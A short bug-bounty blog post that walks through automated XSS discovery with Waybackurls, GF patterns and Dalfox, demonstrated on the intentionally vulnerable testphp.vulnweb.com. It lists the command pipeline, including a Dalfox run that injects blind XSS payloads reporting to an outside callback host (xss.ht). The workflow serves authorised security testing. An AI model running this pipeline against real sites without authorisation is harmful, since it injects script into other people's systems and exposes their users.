Automating XSS using Dalfox, GF and Waybackurls
Published in
2 min readNov 15, 2020
Hello Everyone! đ
Hope you all are good.
Automating Stuff is always fun so Why not XSS. All you need is âGO Langâ installed on your machine and you are ready to go.
Checkout Official Updated Guide on BugBlogs
Pre-Requisites :
- GF by TomNomNom
- GF Patterns by Shiv Chouhan
- WayBackURLs by TomNomNom
- Dalfox by HAHWUL
Workflow
- After Installation of all above mentioned tools, Choose your Target. Letâs use âhttp://testphp.vulnweb.com/â for demonstration purposes.
- Use Waybackurls to fetch URLâs for the chosen target and save the Output in a text file.
echo âtestphp.vulnweb.comâ | waybackurls | tee testphp.txt
- Use GF Patterns to find URLs that give you XSS and Use
sed
command to get our URLs ready for the Dalfox
cat test.txt | gf xss | sed âs/=.*/=/â | sed âs/URL: //â | tee testxss.txt
- Time to fire Dalfox and start finding XSS.
dalfox file testxss.txt -b tigv2.xss.ht pipe
- Make sure you replace my Blind XSS Hunter Payload with that of yours.
Automating Workflow using bash
Check out the Bash Script to automate the workflow.
Hope you guys like this. Do give it a Clap if liked it. đ
Do check out my BugBlogs for more amazing Writeups and Blogs: https://www.bugblogs.tech
Find me on:
LinkedIn: http://linkedin.com/in/keshav-malik/
Twitter: https://twitter.com/g0t_rOoT_